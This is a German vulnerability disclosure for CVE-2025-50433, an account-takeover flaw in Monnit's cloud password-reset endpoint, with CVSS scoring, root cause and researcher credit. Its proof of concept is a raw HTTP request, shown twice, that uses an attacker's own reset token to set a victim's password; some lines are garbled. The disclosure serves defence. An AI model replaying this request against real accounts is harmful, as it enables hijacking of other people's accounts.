
Ausführliche Offenlegung einer kritischen Schwachstelle zur Kontoübernahme (CVE-2025-50433) in Monnit Cloud-Plattformen, mit Schritt-für-Schritt-PoC, Ursachenanalyse und CVSS 9.8 Schweregradbewertung.
Eine kritische Authentifizierungsschwachstelle besteht auf *.imonnit.com,
die eine vollständige Account-Übernahme (ATO) bei jedem Benutzerkonto ohne
Interaktion des Opfers ermöglicht.
Das Backend überprüft nicht die Verknüpfung zwischen dem Passwort-Reset-Token und der Ziel-E-Mail, sodass Angreifer ihr eigenes gültiges Reset-Token verwenden können, um das Passwort eines beliebigen Opferkontos zurückzusetzen.
[email protected]).[email protected]). POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (Kritisch)
Vektor: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
Der Passwort-Reset-Endpunkt überprüft nicht, ob das Reset-Token zur selben E-Mail gehört, die beim Reset-Vorgang angegeben wurde, was beliebige Passwort-Zurücksetzungen mit vom Angreifer kontrollierten Token ermöglicht.
/Account/PasswordReset/
Anbieter: Monnit Corporation
Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor